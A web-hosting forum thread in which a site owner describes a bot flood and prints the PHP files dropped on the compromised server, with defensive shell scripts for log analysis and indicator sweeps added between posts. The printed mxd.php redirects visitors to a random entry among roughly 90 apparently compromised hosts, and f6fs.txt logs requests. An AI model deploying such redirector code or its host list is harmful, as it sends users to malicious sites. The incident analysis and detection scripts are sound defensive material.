  1. #1
    Join Date
    Apr 2008
    Location
    San Telmo, Buenos Aires
    Posts
    12

    Strange http query attack

    Hello, I have had a problem since yesterday on one of my servers. I'm receiving between 200 and 300 hits per second from different IPs to a non-existent path on a site; the hits are going to different cracks, films and download queries. This site is a directory and it's not a warez or P2P site.

    The site is onemilliondirectory.com, and I have suspended it because it was using a lot of resources on the first server; now it's being redirected to another location. I have placed some traffic trackers to determine the referer or any other useful info about the visitors, but the referer is always empty, and I think they are fake users because the StatCounter tracker does not recognize the visits.

    For example, some of the hits are:
    Code:
    GET /suspended.page/?v=ABC%204%20KIDS%20Workshop%201.0.zip HTTP
    GET /suspended.page/?v=DecryptSQL%202.8.zip HTTP/1.1
    GET /suspended.page/?v=[0]%20Msn%20Live%20Messenger%20Mobile.zip
    GET /inactive.html?v=Able%20Photo%20Slide%20Show%202.2.5.5.zip
    GET /suspended.page/?v=English%20Grammar%20Worksheet%201.4.zip
    GET /inactive.html?v=Karaoke%205%2030.zip HTTP/1.1
    GET /suspended.page/?v=Nero%208%208.3.2.1.zip HTTP/1.1
    Detail of one of the visits from the cPanel Latest Visitors tool:
    Code:
    Host: 82.246.88.241
    /inactive.html?a=Knowing.2009.TS.FRENCH.XVID-PaGlop.****.[emule-island.com].avi
    	Http Code: 200 	Date: Apr 07 16:39:54 	Http Version: HTTP/1.1 	Size in Bytes: 262
    	Referer: -
    	Agent: Internet Explorer
    Does someone know what could be happening and how to stop it? Has someone had a similar experience?

    PS: I was checking the stats of the site and I have seen this URL as a referer of one of the visits: blackhatbootcamp.com /affiliates.html. I'm not sure if it has any relation to the problem.

    Thanks in advance
    Daniel

  2. #2
    Hi,

    Use the command below to find any IP making a huge number of HTTP connections to your server.

    netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

    If you want to block it automatically, you may install ddos_deflate:

    http://deflate.medialayer.com/

    Regards,
    we3cares tech
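    The netstat one-liner above only counts connections that are open at the moment it runs, so a crowd of bots that each open one or two connections (which is what the original poster reports in the next reply) never shows up as a single heavy IP. The following is an added example, not code from this thread or from the ddos_deflate project: it aggregates an Apache/cPanel-style access log instead, counting hits per client IP and the share of requests that carry the "?v=" / "?a=" download-style query seen in the first post. The log lines are constructed samples in common log format, and the log path is an assumption; on a cPanel box you would feed it the domain's access log from the stats directory.

```shell
#!/bin/sh
# Added example (not from the thread): aggregate an access log by client IP and
# by the "?v=" / "?a=" download-style query pattern described in the first post.
# netstat only sees connections open right now; bots that open one or two
# connections each stay invisible there but add up in the access log.

# Constructed sample log lines in common log format (not real traffic).
SAMPLE_LOG='82.246.88.241 - - [07/Apr/2009:16:39:54 -0300] "GET /inactive.html?a=some.film.avi HTTP/1.1" 200 262 "-" "Internet Explorer"
89.159.243.18 - - [07/Apr/2009:16:39:55 -0300] "GET /suspended.page/?v=DecryptSQL%202.8.zip HTTP/1.1" 200 262 "-" "Mozilla/4.0"
89.159.243.18 - - [07/Apr/2009:16:39:55 -0300] "GET /suspended.page/?v=Nero%208%208.3.2.1.zip HTTP/1.1" 200 262 "-" "Mozilla/4.0"
10.0.0.5 - - [07/Apr/2009:16:39:56 -0300] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
89.159.243.18 - - [07/Apr/2009:16:39:57 -0300] "GET /inactive.html?v=Karaoke%205%2030.zip HTTP/1.1" 200 262 "-" "Mozilla/4.0"'

# Hits per client IP, busiest first. Reads a log on stdin; $1 is the client
# address in common log format.
hits_per_ip() {
    awk '{ c[$1]++ } END { for (ip in c) print c[ip], ip }' | sort -rn
}

# How many requests carry a "?v=" or "?a=" query (field 7 is the request
# path in common log format). Prints "<matching> <total>".
download_query_share() {
    awk '$7 ~ /\?(v|a)=/ { b++ } END { print b+0, NR }'
}

# Demonstration on the constructed sample; for a real server replace the
# printf with: cat /path/to/access_log (path is an assumption).
printf '%s\n' "$SAMPLE_LOG" | hits_per_ip
printf '%s\n' "$SAMPLE_LOG" | download_query_share
```

If the second number is close to the first, nearly all traffic is the bot pattern and a blanket rule on the query string (for example returning 403 for any request whose query matches `?v=` or `?a=` on paths that never take parameters) cuts the load without having to enumerate thousands of source IPs.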

  3. #3
    Hi, thanks for your reply. I have used the command, but there are no IPs using a huge number of connections; most are using 1 or 2 connections.

    I have checked the folder structure of the site, and I have found that there is a new folder created called "1", and files with the names "logi.php", "log2.php", "ffs2.php", "4556.txt", "file_names.txt", "mxd.php", "down_log.txt", "emlog.txt", "f6fs.txt" and "servernames2.php".

    Most of the files are empty; the file "file_names.txt" has a list of more than 11,000 records like:
    Code:
    Kana Clip 1.1.2.10.czip
    ProStat 4.11.czip
    Stellar Phoenix Solaris-Sparc 1.0.czip
    YupooStream 1.0.10.czip
    erb - Empty Recycle Bin 1.6.2.czip
    The file f6fs.txt:
    Code:
    <?
     // Logs every request that carries an "a" parameter: the client's address
     // and the requested file name are appended to down_log.txt.
     if (isset($_GET["a"]))
     {
      $fp = fopen("down_log.txt", "a");

      if ($fp)
      {
       fwrite($fp, $_SERVER['REMOTE_ADDR']." | ".$_GET["a"]."\n");
       fclose($fp);
      }
     }
    ?>
    and mxd.php:
    Code:
    <?php
    // All the links are entered here; the request is randomly redirected to one of them.
    $hosts = array("http://ad.diapositivas.com/mxd.jpg",
    "http://ad.videoenlaces.com/mxd.jpg",
    "http://addressdev.com/mxd.jpg",
    "http://adndiario.com.ar/mxd.jpg",
    "http://affairedunet.com/mxd.jpg",
    "http://aisanti.com/mxd.jpg",
    "http://aislesofgreen.com/mxd.jpg",
    "http://ajholweg.nl/mxd.jpg",
    "http://anpopobbs.com/mxd.jpg",
    "http://anunciosgo.com.br/mxd.jpg",
    "http://artesecia.com/mxd.jpg",
    "http://azehntner.ch/mxd.jpg",
    "http://bardomineiro.com.br/mxd.jpg",
    "http://borkum.rotary1850.org/mxd.jpg",
    "http://carmendardalla.com/mxd.jpg",
    "http://cartavalurbana.com/mxd.jpg",
    "http://cefaleaemicrania.it/mxd.jpg",
    "http://centrojuma.es/mxd.jpg",
    "http://ciafer.com.br/mxd.jpg",
    "http://cifras.be/mxd.jpg",
    "http://clubtaurinoperalta.com/mxd.jpg",
    "http://coachrunning.be/mxd.jpg",
    "http://contactoangelico.com/mxd.jpg",
    "http://dedidm.agoride.com/mxd.jpg",
    "http://delcarnes.com.br/mxd.jpg",
    "http://dts-developpement.fr/mxd.jpg",
    "http://dunas.com.br/mxd.jpg",
    "http://electrovision-lacasa.com/mxd.jpg",
    "http://ellipseimage.com/mxd.jpg",
    "http://entdeveze.com/mxd.jpg",
    "http://equipoloemi.com/mxd.jpg",
    "http://faracemichele.com/mxd.jpg",
    "http://fengshuiar.com/mxd.jpg",
    "http://fotografiaspastor.com.br/mxd.jpg",
    "http://francobonaventura.net/mxd.jpg",
    "http://freshontime.ro/mxd.jpg",
    "http://gabrielasouto.com.br/mxd.jpg",
    "http://gcisl.com/mxd.jpg",
    "http://harmsen-degroot.nl/mxd.jpg",
    "http://hotelarbus.it/mxd.jpg",
    "http://hotelcapri.com.br/mxd.jpg",
    "http://jsahagung.110mb.com/mxd.jpg",
    "http://keystonesupplements.com/mxd.jpg",
    "http://kunstfoto-engel.com/mxd.jpg",
    "http://madurasputas.webspacemania.com/mxd.jpg",
    "http://maik.fgru.de/mxd.jpg",
    "http://masterbkr.com.br/mxd.jpg",
    "http://mespremierespartitions.fr/mxd.jpg",
    "http://myhomestore.biz/mxd.jpg",
    "http://paintballgalicia.com/mxd.jpg",
    "http://peartreevideo.com/mxd.jpg",
    "http://porntopia.oxyhost.com/mxd.jpg",
    "http://puchuni.com/mxd.jpg",
    "http://putitas.uni.cc/mxd.jpg",
    "http://quiromasajista.net/mxd.jpg",
    "http://rapidlabs.de/mxd.jpg",
    "http://ravestsoft.cl/mxd.jpg",
    "http://residencelucienpaye.fr/mxd.jpg",
    "http://s196859181.online.de/mxd.jpg",
    "http://s92091163.onlinehome.us/mxd.jpg",
    "http://shiatsu-mingmen.com/mxd.jpg",
    "http://songinnight.nayana.com/mxd.jpg",
    "http://soulens.com/mxd.jpg",
    "http://suoninversi.com/mxd.jpg",
    "http://tabuladas.com/mxd.jpg",
    "http://telefuglehund.org/mxd.jpg",
    "http://tinytelly.co.kr/mxd.jpg",
    "http://tsua.net/mxd.jpg",
    "http://villageostia.com/mxd.jpg",
    "http://vinabric.si/mxd.jpg",
    "http://web798.webbox180.server-home.org/mxd.jpg",
    "http://wtal-city.de/mxd.jpg",
    "http://www.aecisrl.com/mxd.jpg",
    "http://www.agriturismoilmandorlo.it/mxd.jpg",
    "http://www.aozora.co.kr/mxd.jpg",
    "http://www.appliteam.com/mxd.jpg",
    "http://www.bookmat.com/mxd.jpg",
    "http://www.bricomatica.net/mxd.jpg",
    "http://www.camel-schmuck.com/mxd.jpg",
    "http://www.dentalclubmercedescova.com/mxd.jpg",
    "http://www.harpadedavi.com/mxd.jpg",
    "http://www.joyhotels.com.br/mxd.jpg",
    "http://www.ktg.hg.pl/mxd.jpg",
    "http://www.nancycroes.com/mxd.jpg",
    "http://www.strcolatina.com.br/mxd.jpg",
    "http://www.superfrozentuna.eu/mxd.jpg",
    "http://yachtpoint.at/mxd.jpg",
    "http://yorukconstruction.com/mxd.jpg",
    "http://zenessens.fr/mxd.jpg");
    // Pick one of the hosts above at random and redirect the client to it.
    header("Location: ".$hosts[rand(0, sizeof($hosts)-1)]);
    ?>
    down_log.txt, a list of 80k records like:
    Code:
    89.159.243.18 | Fantasy.All.Stars.3.XXX.DVDRip.MPEG1.CD2.mpg
    83.194.212.246 | American.Girls.French.Dvdrip.Divx.par.[emule-island.com].avi
    89.159.243.18 | [Wii]Mario_Kart[PAL][ISO-Full].rar
    83.194.212.246 | American.Girls.French.Dvdrip.Divx.par.[emule-island.com].avi
    201.86.66.44 | Steinberg.Cubase.SX.v3.0.2.623-H2O.rar
    4556.txt:
    Code:
    121.134.40.68:4661
    83.233.165.234:4819
    83.233.30.103:4500
    72.172.89.125:4661
    89.248.172.54:4500
    I have searched the net for any info about this, and I have found that there is a trojan called TROJ_BAGLE with the same folder structure, but it's compatible with Win32 and not Unix. http://threatinfo.trendmicro.com/vin...GLE.MV&VSect=T

    I have deleted these files on the old server, changed the DNS records of the site and created it again on a new server, but if I activate it, the server just collapses; in a few seconds the CPU use is 100% and the only way to fix it is to restart and suspend the site again.

    Thanks
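The files listed in post #3 are a small dropped toolkit: f6fs.txt records every requested file name into down_log.txt, and mxd.php answers each hit with a redirect to a random host from a hard-coded list. The load the poster sees on the new server comes from the bots still requesting those paths. What a defender wants next is a repeatable sweep of the document root for that toolkit. The script below is an added example, not code from this thread: it looks for the file names reported in the post and, separately, for any PHP-style file that both sets a Location header and chooses its target with rand(), which is the shape of mxd.php. The sample directory tree it builds is constructed for the demonstration, the content heuristic is an assumption (it will also flag legitimate random redirectors), and you would run the two functions against your own document root instead.

```shell
#!/bin/sh
# Added example (not from the thread): sweep a web root for the dropped files
# described in post #3. Two independent checks:
#   1. file names that match the ones the poster found, and
#   2. PHP-style files that both emit a Location header and pick a target with
#      rand(), the shape of the random redirector mxd.php.
# Directory paths and the content heuristic are assumptions.

# File names reported in the thread.
IOC_NAMES='logi.php log2.php ffs2.php 4556.txt file_names.txt mxd.php down_log.txt emlog.txt f6fs.txt servernames2.php'

# Print every file under $1 whose basename is one of the reported names.
find_named_iocs() {
    root=$1
    for n in $IOC_NAMES; do
        find "$root" -type f -name "$n"
    done | sort
}

# Print every .php or .txt file under $1 (f6fs.txt was PHP despite its
# extension) that contains both 'header("Location:' and 'rand('.
find_random_redirectors() {
    root=$1
    find "$root" -type f \( -name '*.php' -o -name '*.txt' \) -print |
    while read -r f; do
        if grep -q 'header("Location:' "$f" && grep -q 'rand(' "$f"; then
            printf '%s\n' "$f"
        fi
    done | sort
}

# Build a constructed sample tree so the example runs offline: one file shaped
# like mxd.php, one ordinary redirect that must not be flagged, one HTML page.
make_sample_root() {
    d=$(mktemp -d)
    mkdir -p "$d/1"
    printf '<?php $h=array("http://example.invalid/a.jpg"); header("Location: ".$h[rand(0, sizeof($h)-1)]); ?>\n' > "$d/1/mxd.php"
    printf '<?php header("Location: /home"); ?>\n' > "$d/1/login.php"
    printf 'hello\n' > "$d/index.html"
    printf '%s\n' "$d"
}

# Demonstration on the constructed tree; point both functions at your real
# document root (for example /home/<user>/public_html, an assumption) instead.
SAMPLE_ROOT=$(make_sample_root)
echo "named indicators:"
find_named_iocs "$SAMPLE_ROOT"
echo "random redirectors:"
find_random_redirectors "$SAMPLE_ROOT"
rm -rf "$SAMPLE_ROOT"
```

Finding the files is only half the job: they were written by the web server's user, so the same upload or include weakness that let them in will let them back in after a clean rebuild. Checking the application for world-writable directories and unpatched scripts, and watching the access log for the first request that touched each dropped file, tells you which hole to close.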
